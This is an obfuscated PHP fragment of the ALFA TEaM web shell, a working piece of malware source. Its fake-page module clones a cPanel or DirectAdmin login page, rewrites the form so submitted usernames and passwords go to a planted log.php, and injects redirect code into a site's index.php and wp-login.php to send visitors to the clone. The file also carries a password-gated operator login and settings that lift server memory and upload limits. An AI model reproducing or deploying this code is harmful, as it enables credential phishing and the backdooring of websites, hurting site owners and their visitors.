\x30\x25\x3b\x74\162\x61\156\x73\146\x6f\162\x6d\72\x20\x74\x72\141\156\163\154\141\164\145\50\55\65\60\45\51\x3b\42\76\74\144\151\166\40\163\164\171\x6c\145\x3d\x22\155\141\x72\147\151\x6e\55\142\157\164\x74\157\155\x3a\66\x70\170\x3b\x22\76\x3c\x73\160\141\156\x20\163\164\171\154\145\75\x22\x64\151\x73\x70\154\141\171\x3a\x20\151\156\x6c\x69\156\x65\55\x62\154\x6f\x63\153\x3b\x77\x69\x64\x74\150\x3a\x20\61\60\66\x70\x78\73\x22\x3e\120\141\156\x65\154\x3a\40\74\57\x73\x70\141\x6e\x3e\74\163\145\x6c\145\143\164\x20\x73\164\171\x6c\x65\75\x22\x77\x69\144\164\150\x3a\x31\60\60\160\x78\73\42\x20\156\x61\155\145\x3d\42\160\141\156\145\x6c\x22\x3e"; $cm_array = array("\143\160\141\x6e\145\154" => "\x43\160\x61\156\145\x6c", "\x64\x69\162\145\143\164\x61\144\155\x69\x6e" => "\x44\151\162\x65\x63\164\x41\144\155\x69\156"); foreach ($cm_array as $key => $val) { echo "\x3c\157\160\x74\x69\157\156\x20\166\141\154\x75\x65\x3d\x22" . $key . "\x22\76" . $val . "\x3c\x2f\157\x70\x74\151\157\156\76"; } echo "\74\x2f\163\x65\154\x65\x63\x74\76\74\57\144\151\x76\x3e"; echo "\74\144\x69\166\x20\163\164\x79\x6c\145\75\x22\x6d\141\x72\x67\x69\156\x2d\x62\157\164\164\x6f\155\72\x36\160\x78\x3b\42\76\x3c\163\160\x61\x6e\x20\x73\164\x79\154\145\75\x22\144\x69\163\160\x6c\141\x79\x3a\x20\x69\x6e\154\151\x6e\x65\55\x62\154\x6f\x63\x6b\x3b\x77\x69\144\x74\150\72\40\x31\60\66\160\170\73\42\76\x43\x6c\157\156\145\x20\x70\x61\147\145\x3a\40\x3c\57\x73\160\141\x6e\x3e\74\151\x6e\160\x75\x74\x20\x73\151\x7a\145\75\x22\65\x30\42\40\x74\x79\x70\145\x3d\x22\x74\145\x78\x74\x22\x20\x6e\x61\155\145\x3d\x22\x63\154\157\156\145\137\160\141\x67\145\x22\x20\160\154\x61\143\x65\150\x6f\x6c\144\145\162\x3d\x22\145\147\72\x20\x68\164\164\160\163\72\x2f\x2f\164\x61\x72\x67\145\164\x2e\x63\157\x6d\x3a\62\60\70\x33\x20\x7c\x20\x68\164\x74\160\x73\72\x2f\x2f\x74\x61\x72\147\145\164\x2e\x63\x6f\155\x3a\x32\62\x32\62\42\76\74\57\144\x69\x76\76\12\11\74\x64\x69\166\40\x73\164\171\154\x65\x3d\42\x6d\x61\162\147\x69\156\55\142\157\164\x74\157\155\72\66\160\170\73\x22\76\74\x73\160\x61\156\76\106\141\x6b\145\x20\160\x61\x67\145\40\162\157\x6f\164\72\40\x3c\x2f\x73\x70\141\156\x3e\74\x69\156\x70\165\164\x20\x73\x69\172\145\75\x22\x35\x30\42\40\164\x79\x70\145\x3d\x22\x74\x65\170\x74\42\40\x6e\x61\x6d\145\75\42\x66\141\153\145\x5f\162\157\157\x74\x22\40\x76\x61\x6c\165\x65\75\x22" . $_SERVER["\x44\x4f\103\x55\x4d\x45\x4e\x54\137\122\x4f\x4f\x54"] . "\57\x66\141\153\x65\137\160\x61\147\145\x5f\x72\x6f\157\x74\x2f\x22\x3e\x3c\x2f\144\151\166\x3e\xa\11\74\x64\x69\166\x20\x73\164\x79\x6c\x65\75\42\x6d\141\162\147\151\156\55\x62\157\x74\x74\157\x6d\72\66\160\x78\73\x22\x3e\x3c\163\x70\x61\x6e\40\x73\164\x79\x6c\145\x3d\42\x64\151\x73\x70\154\141\x79\72\x20\151\x6e\x6c\151\x6e\145\55\x62\x6c\157\143\153\x3b\167\151\144\x74\x68\72\40\61\60\66\160\x78\73\x22\x3e\111\x6e\152\145\143\x74\x20\x74\157\72\40\x3c\x2f\x73\160\x61\156\x3e\x3c\x69\156\x70\165\x74\x20\163\151\x7a\x65\x3d\42\65\60\x22\40\164\x79\160\x65\75\42\164\145\x78\x74\42\40\156\141\155\x65\x3d\42\151\156\x6a\x65\x63\164\137\x74\157\x22\x20\166\x61\154\165\x65\75\42" . $_SERVER["\x44\x4f\x43\125\x4d\105\x4e\x54\x5f\122\117\117\124"] . "\57\151\156\x64\145\x78\x2e\x70\150\160\42\x3e\74\x2f\x64\151\x76\x3e\xa\11\74\144\x69\x76\x20\x73\x74\171\154\145\x3d\x22\x6d\x61\x72\x67\151\x6e\x2d\142\x6f\164\164\157\x6d\x3a\66\160\170\x3b\x22\x3e\74\163\160\141\x6e\40\x73\x74\x79\x6c\x65\x3d\42\x64\151\163\160\x6c\141\x79\72\x20\x69\156\x6c\x69\156\x65\x2d\x62\154\157\x63\153\73\167\151\144\164\x68\x3a\x20\x31\60\66\160\170\x3b\42\x3e\x42\151\156\144\x20\x6f\156\72\x20\x3c\x2f\163\x70\141\156\x3e\x3c\x69\x6e\x70\x75\x74\x20\x73\151\172\145\x3d\42\x35\x30\42\x20\x74\x79\x70\145\75\42\x74\145\x78\164\42\40\x6e\141\x6d\x65\75\42\x62\151\x6e\144\x5f\157\x6e\x22\x20\160\x6c\x61\x63\145\150\x6f\x6c\144\x65\162\75\42\x65\147\x3a\40" . $_SERVER["\x44\117\103\x55\x4d\x45\x4e\x54\x5f\122\117\117\124"] . "\x2f\x77\x70\55\154\x6f\147\x69\x6e\x2e\x70\x68\x70\x22\x3e\74\x2f\144\151\x76\76\xa\x9\x3c\144\151\x76\40\163\164\x79\154\145\x3d\x22\155\141\162\x67\x69\x6e\x2d\x62\x6f\x74\x74\x6f\x6d\x3a\x36\160\x78\73\42\76\x3c\163\160\141\156\40\x73\x74\x79\154\x65\75\x22\x64\151\x73\x70\x6c\x61\171\72\x20\151\x6e\x6c\x69\x6e\x65\55\142\x6c\157\143\153\x3b\x77\x69\144\x74\150\72\x20\61\x30\x36\x70\170\x3b\x22\76\x4c\x6f\147\40\x54\x6f\72\40\74\57\163\160\x61\156\x3e\74\x69\x6e\x70\x75\164\x20\163\x69\172\145\75\42\65\x30\x22\x20\x74\x79\160\x65\x3d\x22\164\145\170\164\42\x20\156\x61\x6d\145\75\x22\x6c\x6f\x67\x74\157\42\x20\166\x61\x6c\165\145\x3d\x22" . $GLOBALS["\x63\167\x64"] . "\x6c\157\147\x73\56\x74\x78\164\x22\x3e\x3c\57\x64\151\x76\x3e\12\x9\74\x64\x69\x76\x20\x73\x74\x79\x6c\145\x3d\42\155\x61\x72\x67\x69\156\x2d\x62\157\164\x74\x6f\x6d\72\x36\x70\170\x3b\42\76\74\x73\x70\141\x6e\x20\163\164\171\x6c\145\x3d\42\x64\151\x73\160\154\x61\x79\72\40\x69\156\x6c\x69\156\x65\55\x62\x6c\x6f\x63\x6b\73\x77\x69\144\164\x68\72\x20\61\x30\x36\160\x78\73\42\x3e\103\157\x75\x6e\164\40\x6f\146\x20\111\x6e\x76\141\x6c\151\144\x20\x6c\x6f\x67\x69\156\72\x20\x3c\x2f\163\x70\x61\x6e\76\x3c\x69\x6e\x70\x75\164\40\163\x69\172\x65\x3d\42\62\x30\42\x20\164\171\x70\x65\x3d\x22\x74\145\x78\x74\42\40\156\x61\x6d\x65\75\42\143\x6f\165\x6e\x74\42\x20\166\141\x6c\165\x65\x3d\x22\x33\42\40\x73\x74\171\x6c\145\x3d\42\164\x65\170\164\x2d\x61\x6c\151\x67\156\x3a\x63\x65\x6e\x74\145\162\73\42\76\x3c\x2f\x64\151\x76\x3e\xa\11\74\x64\151\x76\40\163\x74\171\154\145\x3d\42\x74\x65\x78\164\55\141\x6c\151\x67\156\72\x63\145\156\164\x65\162\73\42\76\74\x69\156\160\165\164\x20\x74\171\x70\145\x3d\42\163\x75\142\155\x69\164\x22\40\x6e\x61\x6d\x65\75\x22\x62\x74\156\x22\40\166\141\x6c\x75\145\75\42\x20\42\x3e\x3c\x2f\x64\151\166\76\x3c\57\144\x69\166\x3e\74\57\x66\x6f\162\155\x3e\74\x62\162\76"; $clone_page = $_POST["\x61\x6c\146\141\61"]; $fake_root = $_POST["\141\154\x66\x61\62"]; $logto = $_POST["\141\154\146\141\x34"]; $panel = $_POST["\141\x6c\x66\141\x35"]; $inject_to = $_POST["\141\154\146\x61\x36"]; $bind_on = $_POST["\141\154\x66\141\x37"]; $count = $_POST["\141\x6c\x66\x61\70"]; if (!empty($clone_page) && !empty($fake_root) && !empty($logto) && !empty($inject_to) && !empty($bind_on) && $_POST["\141\154\146\x61\x33"] == "\x3e\76") { echo __pre(); $target = $clone_page; $curl = new AlfaCURL(); $source_page = $curl->Send($target); if (!empty($source_page)) { $matched_form = ''; if ($panel == "\x63\160\141\x6e\145\x6c") { if (preg_match("\x23\x3c\x66\157\x72\155\x28\x2e\x2a\x29\151\x64\75\42\154\x6f\147\x69\156\x5f\146\157\162\x6d\x22\x28\56\52\51\x3e\x23", $source_page, $match)) { $matched_form = $match[0]; } } else { if (preg_match("\43\x3c\x66\x6f\162\x6d\x28\56\52\x3f\51\x3e\x23", $source_page, $match)) { $matched_form = $match[0]; } } if (!empty($matched_form)) { $fake = ''; $pwd = str_replace($_SERVER["\x44\x4f\103\x55\x4d\105\116\x54\x5f\x52\117\x4f\x54"], '', $fake_root); $uri = str_replace($_SERVER["\104\117\x43\125\115\x45\x4e\124\x5f\122\117\x4f\x54"], '', $inject_to); if ($panel == "\x63\x70\141\156\145\x6c") { $port = "\x32\x30\x38\63"; } else { $target = str_replace(array("\x68\164\x74\160\x3a\57\x2f", "\x68\x74\164\x70\x73\72\57\57"), '', $target); $port = explode("\72", $target); $port = $port[1]; } if (substr($uri, 0, 1) == "\x2f") { $uri = substr($uri, 1); } $uri = $_SERVER["\x48\x54\124\120\x5f\x4f\122\111\x47\x49\x4e"] . "\57" . str_replace("\151\x6e\144\145\170\x2e\160\x68\160", '', $uri) . "\x3f\72" . $port; $log_url = $_SERVER["\x48\124\124\120\137\117\x52\111\107\x49\116"] . $pwd . "\57\x6c\157\x67\x2e\x70\x68\x70"; if ($panel == "\x63\160\141\x6e\145\154") { $form = "\74\146\157\x72\x6d\40\x6e\157\166\x61\154\151\x64\141\164\x65\x20\151\144\x3d\x22\x6c\157\x67\151\x6e\x5f\x66\x6f\162\155\x22\x20\x61\x63\164\x69\x6f\156\75\x22" . $log_url . "\x22\40\x6d\x65\164\150\157\x64\75\42\160\x6f\x73\x74\x22\40\164\x61\x72\147\145\164\75\x22\137\164\x6f\160\x22\40\x73\x74\x79\x6c\145\75\42\166\x69\x73\151\142\151\x6c\x69\x74\x79\72\42\x3e"; } else { $form = "\74\146\x6f\162\x6d\40\x61\x63\x74\151\x6f\x6e\x3d\x22" . $log_url . "\x22\x20\x6d\x65\x74\150\157\x64\75\x22\x70\x6f\x73\164\42\x3e"; } $fake = str_replace($matched_form, $form, $source_page); if (@(!is_dir($fake_root))) { @mkdir($fake_root, 511, true); } $cookie_name = "\141\x6c\x66\141\137\146\x61\x6b\145\x70\x61\x67\x65\x5f\143\157\165\156\164\x65\162" . rand(9999, 99999); $post_user = "\x75\x73\145\162"; $post_pass = "\160\x61\x73\x73"; $resp_code = "\151\146\x28\x65\x6d\160\x74\x79\50\x24\x75\x73\145\x72\x29\51\x7b\x68\164\x74\x70\137\162\x65\163\160\x6f\156\x73\145\x5f\x63\x6f\x64\x65\x28\64\60\60\x29\x3b\x65\143\150\x6f\40\152\x73\157\x6e\x5f\x65\x6e\x63\x6f\144\145\x28\x61\x72\x72\x61\x79\x28\42\x6d\x65\163\163\x61\147\145\42\x20\75\x3e\40\x22\x6e\x6f\x5f\x75\x73\145\x72\156\x61\x6d\x65\x22\x29\51\x3b\175\145\154\163\145\x7b\150\164\x74\160\137\x72\x65\x73\x70\157\156\x73\x65\x5f\x63\x6f\x64\x65\x28\x34\60\61\51\x3b\x7d"; if ($panel != "\143\x70\141\x6e\145\154") { $post_user = "\x75\x73\x65\x72\x6e\141\x6d\145"; $post_pass = "\x70\x61\163\163\167\157\162\144"; $resp_code = "\100\150\145\x61\x64\145\x72\50\x22\114\x6f\143\141\164\x69\157\156\x3a\x20\x22\x2e\44\x5f\123\x45\122\126\x45\122\x5b\x27\110\x54\x54\120\x5f\x52\x45\x46\x45\x52\x45\122\47\x5d\x29\73"; } $cpanel_log = "\x3c\77\160\x68\x70\40\44\x63\157\x6f\153\x5f\164\x69\x6d\x65\x20\x3d\x20\x74\151\155\145\x28\51\x2b\x28\70\x36\x34\x30\x30\x20\x2a\x20\67\51\73\x20\44\x75\x73\x65\162\40\75\40\x24\137\x50\117\x53\x54\133\42" . $post_user . "\x22\135\x3b\44\160\x61\x73\x73\x20\75\x20\44\137\x50\117\123\124\x5b\42" . $post_pass . "\42\x5d\73\x69\146\x28\41\145\155\160\x74\171\50\44\x75\163\145\162\51\40\x26\46\x20\x21\145\155\160\164\x79\50\44\x70\141\x73\163\x29\51\173\x69\x66\x28\x21\x69\x73\163\145\x74\50\44\x5f\103\x4f\x4f\x4b\x49\105\x5b\42" . $cookie_name . "\42\x5d\x29\x29\x7b\100\163\x65\x74\x63\157\x6f\153\151\x65\50\42" . $cookie_name . "\x22\54\x20\x30\x2c\x20\44\143\157\x6f\x6b\x5f\164\x69\x6d\x65\54\40\42\57\x22\51\x3b\x24\137\103\x4f\117\113\x49\x45\x5b\x22" . $cookie_name . "\x22\x5d\x3d\x31\73\x7d\x69\146\50\x28\x69\156\164\51\44\137\x43\117\117\x4b\111\105\133\x22" . $cookie_name . "\42\x5d\x3e" . $count . "\51\x7b\100\150\145\141\x64\145\x72\50\x22\114\157\143\141\164\151\157\156\x3a\x20\x2f\x22\x29\x3b\x65\x78\151\x74\73\x7d\100\163\145\164\x63\157\x6f\153\x69\x65\50\42" . $cookie_name . "\42\54\40\x28\50\151\156\164\51\44\137\103\117\117\x4b\x49\x45\x5b\42" . $cookie_name . "\x22\x5d\40\53\40\61\x29\x2c\40\x24\x63\x6f\x6f\x6b\x5f\x74\151\155\145\x2c\x20\x22\x2f\42\51\73\44\146\x70\x20\x3d\40\100\x66\157\160\x65\156\x28\42" . $logto . "\x22\54\x20\x22\141\53\x22\51\x3b\x40\146\x77\x72\151\x74\145\50\44\146\x70\x2c\40\x24\165\x73\145\x72\40\x2e\40\x22\40\x3a\40\x22\x20\56\40\44\160\x61\x73\x73\40\56\40\x22\134\156\42\x29\x3b\146\143\x6c\x6f\163\145\50\44\x66\160\x29\x3b\163\154\145\x65\160\50\63\51\x3b" . $resp_code . "\x65\x78\x69\164\x3b\175\77\76"; @file_put_contents($fake_root . "\57\154\157\147\56\x70\x68\x70", $cpanel_log); if ($panel == "\143\x70\x61\156\x65\154") { $fake = preg_replace(array("\x23\x3c\154\x69\x6e\x6b\x28\56\52\51\x68\162\145\x66\x3d\x22\50\56\52\51\42\x28\x2e\x2a\x29\76\43", "\x23\74\x69\x6d\x67\40\x63\x6c\x61\163\x73\x3d\x22\155\x61\151\x6e\55\x6c\x6f\x67\157\42\x20\x73\x72\143\x3d\42\50\x2e\x2a\51\x22\x28\56\52\51\x3e\43", "\43\x20\74\141\x28\56\52\x29\x69\144\x3d\42\162\145\163\145\x74\x5f\160\141\x73\x73\x77\x6f\162\x64\42\76\x23"), array("\74\154\x69\x6e\x6b\x20\x68\162\x65\146\x3d\x22" . $target . "\x2f\44\62\x22\x3e", "\74\x69\155\147\x20\143\x6c\141\163\x73\x3d\x22\x6d\141\151\156\55\x6c\157\x67\157\42\40\x73\162\143\x3d\x22" . $target . "\x2f\x24\x31\42\40\141\x6c\x74\x3d\42\154\x6f\147\157\x22\x20\57\76", "\74\x61\x20\150\162\x65\x66\75\x22\x23\42\40\x69\x64\x3d\x22\162\145\163\x65\x74\x5f\x70\x61\163\163\167\x6f\x72\144\42\76"), $fake); } @file_put_contents($fake_root . "\57\x69\x6e\144\x65\x78\x2e\160\x68\160", $fake); $inject_code = "\x3c\x3f\160\x68\160\x20\x69\146\x28\151\163\163\x65\x74\50\x24\137\x47\105\x54\133\x22\72\x32\x30\x38\x33\x22\x5d\x29\x26\46\50\x69\x6e\164\x29\x24\x5f\103\x4f\x4f\113\x49\x45\133\42" . $cookie_name . "\42\135\x3c" . $count . "\51\173\100\x69\156\x63\x6c\x75\x64\145\50\42" . $fake_root . "\x2f\x69\x6e\x64\x65\x78\56\160\150\160\42\x29\73\145\x78\x69\x74\73\x7d\x3f\x3e"; $bind_on_code = "\74\x3f\x70\x68\x70\40\151\x66\x28\50\x69\x6e\164\x29\x24\x5f\x43\x4f\117\x4b\x49\x45\x5b\42" . $cookie_name . "\42\135\x3c" . $count . "\51\173\x40\x68\145\141\144\145\162\50\x22\114\x6f\x63\x61\x74\x69\x6f\156\x3a\x20" . $uri . "\x22\51\73\x65\170\151\x74\73\175\77\76"; @file_put_contents($inject_to, $inject_code . "\xa" . @file_get_contents($inject_to)); @file_put_contents($bind_on, $bind_on_code . "\12" . @file_get_contents($bind_on)); echo "\163\165\143\x63\145\163\x73\x2e\x2e\56\41"; } else { echo "\x66\x61\x69\154\145\144\x2e\56\x2e\x21"; } } else { echo "\x3c\x64\151\166\x20\163\x74\x79\154\x65\75\x27\x74\145\x78\164\x2d\x61\x6c\151\x67\x6e\72\143\145\156\164\145\x72\73\143\157\154\157\x72\72\162\145\x64\x3b\47\76\x43\x61\x6e\156\157\164\x20\x6f\x70\145\x6e\x20\x74\150\x65\40\164\x61\162\x67\145\164\56\56\56\x21\x3c\x2f\x64\x69\166\x3e"; } } echo "\74\x2f\144\151\x76\76"; alfafooter(); } goto VBrHH; EoAWA: function __get_resource($content) { return @gzinflate(__ZGVjb2Rlcg($content)); } goto Ze0OK; vrpxi: @ini_set("\155\145\x6d\x6f\162\171\137\x6c\151\155\151\164", "\55\x31"); goto JisW0; W1P0Y: $psDEwGhsxg = "\147\172" . "\x69\156\x66" . "\154\141\x74\145"; goto It5ls; JisW0: @ini_set("\x75\160\x6c\x6f\141\144\137\x6d\x61\x78\137\x66\x69\154\145\x73\151\x7a\x65", "\71\71\71\x39\x6d"); goto hD7du; nhViU: @error_reporting(E_ALL ^ E_NOTICE); goto u4yR4; hD7du: if ($config["\101\x6c\146\141\120\x72\x6f\x74\145\143\x74\123\150\145\x6c\x6c"]) { $SERVER_SIG = isset($_SERVER["\123\x45\122\x56\x45\x52\137\x53\x49\107\116\x41\x54\125\122\x45"]) ? $_SERVER["\123\105\122\x56\x45\122\x5f\123\111\107\x4e\101\x54\x55\122\105"] : ''; $Eform = "\x3c\x66\157\x72\155\x20\155\145\x74\150\157\144\75\x22\x70\x6f\163\164\x22\76\x3c\x69\x6e\x70\x75\164\x20\163\164\x79\x6c\x65\x3d\x22\155\x61\162\147\151\156\x3a\60\73\142\141\143\153\147\x72\x6f\x75\156\144\x2d\x63\x6f\x6c\157\x72\72\x23\x66\146\146\x3b\x62\157\x72\x64\145\x72\x3a\x31\x70\x78\x20\x73\x6f\x6c\151\144\40\x23\146\146\x66\x3b\x22\40\164\171\x70\145\x3d\x22\160\x61\x73\163\x77\x6f\162\144\x22\x20\156\141\x6d\x65\x3d\x22\160\141\163\163\167\157\162\x64\x22\76\74\x2f\146\157\162\x6d\x3e"; if ($config["\101\154\146\x61\114\157\x67\151\x6e\120\141\x67\145"] == "\147\x75\x69") { if (@$_COOKIE["\x41\154\146\x61\x55\x73\x65\162"] != $config["\101\154\x66\x61\x55\x73\145\x72"] && $_COOKIE["\101\154\146\x61\x50\x61\163\163"] != md5($config["\101\x6c\x66\141\x50\x61\x73\163"])) { if (@$_POST["\x75\163\x72\x6e\141\x6d\x65"] == $config["\x41\154\x66\x61\125\163\x65\162"] && @md5($_POST["\x70\141\x73\x73\167\157\x72\x64"]) == $config["\101\154\146\141\x50\141\163\163"]) { __alfa_set_cookie("\101\x6c\x66\141\125\163\x65\x72", $config["\101\154\x66\x61\x55\x73\x65\x72"]); __alfa_set_cookie("\x41\154\x66\141\x50\x61\x73\x73", @md5($config["\x41\154\x66\x61\120\141\x73\163"])); @header("\x6c\157\143\141\164\151\157\x6e\72\40" . $_SERVER["\120\110\120\x5f\123\105\114\x46"]); } echo "\12\x3c\163\x74\171\154\x65\x3e\xa\x62\157\x64\171\173\x62\x61\143\153\x67\x72\x6f\x75\x6e\x64\x3a\40\142\x6c\141\x63\x6b\x3b\x7d\12\43\154\157\147\x69\156\x62\157\x78\40\x7b\x20\x66\157\x6e\164\55\x73\151\172\x65\x3a\x31\61\x70\x78\x3b\40\x63\x6f\x6c\157\162\72\x67\162\x65\145\156\x3b\x20\x72\x69\x67\150\164\x3a\x38\65\x70\x78\73\x20\167\x69\x64\x74\150\72\x31\62\x30\60\160\x78\73\x20\x68\x65\151\x67\150\164\x3a\x32\x30\60\x70\x78\x3b\x20\142\x6f\x72\144\145\162\x2d\x72\x61\144\151\165\163\72\65\x70\170\x3b\x20\55\x6d\157\172\55\x62\x6f\144\145\162\55\162\x61\144\151\165\163\72\x35\160\170\73\40\x70\157\163\x69\x74\x69\x6f\x6e\72\146\x69\x78\145\144\x3b\x20\x74\157\x70\72\62\x35\x30\x70\170\x3b\x20\x7d\12\x23\x6c\x6f\147\151\156\142\157\x78\40\164\x64\x20\173\40\x62\x6f\x72\x64\x65\162\55\162\141\144\x69\x75\163\x3a\65\x70\170\x3b\x20\x66\x6f\156\164\55\x73\151\x7a\x65\72\x31\61\160\170\x3b\x20\175\12\x3c\57\163\x74\x79\154\145\x3e\xa\x3c\x74\151\x74\x6c\x65\76\x7e\40\x41\x4c\x46\x41\40\x54\105\x61\115\40\123\x68\145\154\x6c\x2d\x76" . __ALFA_VERSION__ . "\x2d" . __ALFA_CODE_NAME__ . "\40\x7e\x3c\x2f\164\151\x74\154\145\76\x3c\143\x65\156\164\x65\162\x3e\12\74\x63\x65\x6e\x74\145\162\76\74\x69\155\x67\40\163\164\x79\154\x65\75\42\x62\x6f\162\144\145\162\x2d\x72\141\144\x69\x75\163\72\61\x30\60\x70\x78\73\x22\40\x77\x69\x64\164\x68\75\x22\65\x30\x30\42\40\150\x65\151\147\x68\164\75\x22\x32\65\x30\42\x20\141\x6c\x74\75\42\141\154\146\141\40\x74\145\x61\x6d\40\x32\60\x31\62\42\x20\144\x72\141\x67\147\141\142\x6c\x65\x3d\x22\146\x61\154\x73\145\x22\x20\163\162\143\x3d\42\150\x74\164\x70\72\57\x2f\x73\x6f\x6c\145\x76\x69\163\151\142\x6c\145\x2e\143\x6f\x6d\57\x69\155\141\147\145\163\x2f\x61\x6c\x66\x61\x2d\151\x72\x61\156\56\160\156\147\42\40\x2f\x3e\x3c\x2f\x63\145\x6e\x74\145\x72\76\12\x3c\144\151\x76\x20\x69\144\75\154\x6f\x67\x69\156\x62\157\170\x3e\74\x70\x3e\74\146\157\x6e\x74\x20\x66\141\x63\x65\75\42\x76\145\x72\144\141\156\x61\x2c\141\x72\151\x61\x6c\42\40\x73\x69\172\145\x3d\55\61\76\12\74\143\x65\x6e\x74\145\x72\76\74\164\141\x62\154\145\x20\x63\x65\154\154\160\x61\144\144\x69\x6e\147\75\x27\62\x27\x20\x63\x65\x6c\x6c\x73\160\x61\143\151\x6e\147\x3d\x27\60\x27\40\142\x6f\x72\144\x65\x72\x3d\x27\60\47\x20\x69\144\x3d\x27\x61\160\137\x74\x61\x62\x6c\145\x27\x3e\12\x3c\164\x72\76\x3c\x74\x64\40\x62\x67\x63\x6f\x6c\157\162\x3d\x22\x67\x72\x65\145\x6e\42\76\x3c\x74\x61\x62\x6c\x65\x20\x63\145\x6c\154\160\x61\144\x64\x69\x6e\x67\75\x27\x30\47\x20\x63\145\x6c\x6c\x73\x70\x61\x63\151\156\147\75\x27\60\x27\40\142\157\162\x64\x65\162\x3d\47\60\x27\x20\167\151\144\x74\150\x3d\47\x31\60\60\x25\x27\x3e\x3c\164\162\x3e\74\x74\144\x20\x62\x67\143\157\x6c\157\x72\x3d\42\147\162\x65\x65\x6e\x22\40\141\154\151\147\x6e\x3d\143\x65\156\164\145\x72\40\x73\164\171\154\x65\x3d\42\160\141\x64\144\x69\x6e\147\x3a\x32\73\160\141\x64\x64\151\156\147\55\142\x6f\x74\x74\157\x6d\x3a\64\42\76\74\x62\76\74\146\157\x6e\164\x20\143\x6f\x6c\157\162\75\x22\167\150\151\x74\x65\42\x20\x73\x69\x7a\x65\75\x2d\x31\x20\143\x6f\x6c\x6f\162\x3d\x22\x77\x68\151\x74\145\x22\40\x66\x61\143\145\75\42\x76\x65\162\x64\141\x6e\x61\x2c\141\x72\151\x61\154\x22\76\x3c\142\76\176\x20\x41\x4c\106\101\x20\124\x45\141\x4d\40\123\150\x65\154\x6c\55\166" . __ALFA_VERSION__ . "\55" . __ALFA_CODE_NAME__ . "\40\176\74\x2f\142\x3e\74\x2f\146\157\x6e\x74\76\74\57\164\x68\x3e\x3c\x2f\164\x72\x3e\xa\x3c\164\x72\76\x3c\x74\144\x20\x62\x67\143\x6f\x6c\157\x72\x3d\42\x62\x6c\x61\143\x6b\x22\40\163\x74\171\x6c\145\x3d\x22\x70\x61\x64\x64\151\156\147\72\65\x22\x3e\xa\x3c\x66\x6f\x72\x6d\40\155\145\x74\150\157\x64\75\42\x70\x6f\x73\x74\x22\76\xa\74\x69\x6e\x70\x75\164\x20\x74\x79\x70\x65\75\x22\150\151\144\x64\x65\156\x22\40\156\x61\155\145\x3d\x22\141\x63\x74\x69\157\x6e\42\40\x76\141\154\x75\145\x3d\x22\154\x6f\147\x69\x6e\x22\x3e\12\74\x69\156\160\165\164\x20\164\171\160\x65\75\42\150\151\144\x64\x65\156\x22\40\x6e\x61\x6d\145\x3d\x22\150\151\x64\x65\x22\40\x76\x61\154\165\x65\x3d\42\x22\x3e\xa\74\x63\145\x6e\x74\145\162\x3e\x3c\x74\x61\x62\x6c\145\76\xa\74\164\162\76\74\x74\x64\76\x3c\x66\157\156\x74\40\x63\x6f\x6c\x6f\162\x3d\42\147\162\x65\145\156\x22\40\146\141\x63\x65\75\x22\166\x65\162\144\141\x6e\141\x2c\141\x72\151\x61\154\42\x20\163\x69\172\x65\x3d\55\x31\x3e\x4c\x6f\147\151\156\x3a\74\x2f\146\157\156\x74\x3e\x3c\x2f\x74\x64\76\x3c\164\144\76\74\x69\156\x70\165\x74\x20\x74\x79\160\x65\75\42\x74\x65\x78\164\42\x20\x73\x69\172\x65\x3d\42\63\x30\x22\40\x6e\x61\155\x65\75\x22\165\163\x72\156\x61\155\145\42\x20\160\x6c\x61\x63\145\150\157\154\x64\145\x72\x3d\x22\165\163\145\x72\x6e\141\155\145\42\40\x6f\156\146\x6f\x63\x75\x73\x3d\x22\151\x66\x20\x28\164\x68\151\163\x2e\x76\141\x6c\165\x65\x20\75\x3d\x20\x27\x75\x73\x65\x72\x6e\141\155\145\47\x29\x7b\x74\x68\x69\x73\x2e\x76\141\154\x75\x65\40\75\40\x27\x27\x3b\x7d\x22\x3e\74\57\164\144\76\74\57\x74\162\76\12\74\x74\162\x3e\74\x74\144\x3e\74\x66\157\156\164\40\143\157\x6c\x6f\162\x3d\x22\x67\x72\x65\145\156\x22\x20\x66\x61\143\145\x3d\x22\166\145\162\144\141\156\x61\x2c\141\x72\151\x61\154\x22\40\x73\x69\172\145\x3d\55\x31\x3e\x50\141\163\x73\x77\157\162\144\x3a\x3c\57\x66\157\x6e\164\x3e\x3c\57\x74\144\x3e\74\164\x64\x3e\74\151\x6e\160\165\164\40\164\171\160\x65\x3d\42\160\141\x73\163\x77\x6f\x72\x64\42\x20\163\151\x7a\145\x3d\x22\63\60\42\x20\x6e\x61\x6d\145\x3d\x22\x70\x61\163\163\x77\157\162\x64\42\40\160\x6c\x61\x63\x65\150\x6f\154\x64\145\x72\75\42\160\141\x73\163\x77\x6f\x72\144\42\40\x6f\156\x66\157\143\165\x73\75\x22\x69\146\x20\50\164\150\x69\x73\56\166\x61\x6c\x75\145\40\x3d\x3d\x20\x27\x70\x61\x73\163\167\157\162\144\x27\x29\40\164\150\151\163\x2e\166\141\154\x75\x65\x20\75\x20\x27\47\x3b\42\x3e\x3c\57\164\x64\x3e\x3c\57\x74\x72\x3e\12\x3c\164\x72\x3e\x3c\164\x64\x3e\x3c\146\157\156\164\40\146\141\143\x65\x3d\42\166\x65\162\x64\141\x6e\x61\x2c\141\162\x69\x61\154\x22\x20\163\x69\x7a\145\75\x2d\x31\x3e\46\x6e\142\x73\160\x3b\74\57\x66\x6f\156\164\76\74\x2f\164\144\76\x3c\x74\144\x3e\74\146\x6f\x6e\164\40\146\141\143\x65\x3d\x22\166\145\x72\144\141\x6e\141\54\141\162\151\141\x6c\x22\x20\163\151\172\x65\x3d\55\x31\x3e\x3c\x69\156\x70\165\x74\x20\164\x79\x70\145\75\42\x73\165\142\x6d\x69\x74\42\x20\x76\x61\x6c\165\145\x3d\42\x4c\x6f\x67\151\x6e\x22\76\74\x2f\x66\157\x6e\x74\76\x3c\57\164\x64\x3e\74\x2f\164\162\76\x3c\57\x74\141\142\154\145\76\xa\74\x2f\144\151\166\x3e\x3c\x62\162\40\57\x3e\x3c\x2f\143\145\x6e\164\145\x72\76"; die; } } elseif ($config["\x41\154\x66\141\114\157\147\151\156\120\x61\147\145"] == "\x35\60\x30") { if (@$_COOKIE["\101\154\146\x61\120\x61\163\163"] != @md5($config["\101\154\x66\141\120\x61\x73\x73"])) { if (@md5($_POST["\x70\x61\163\163\x77\x6f\x72\144"]) == $config["\101\154\x66\x61\x50\x61\x73\163"]) { __alfa_set_cookie("\101\154\146\141\x55\x73\x65\162", $config["\101\154\x66\x61\125\x73\145\162"]); __alfa_set_cookie("\x41\154\146\141\x50\141\163\x73", @md5($config["\101\x6c\x66\141\120\141\x73\163"])); @header("\x6c\x6f\143\141\164\151\x6f\156\72\40" . 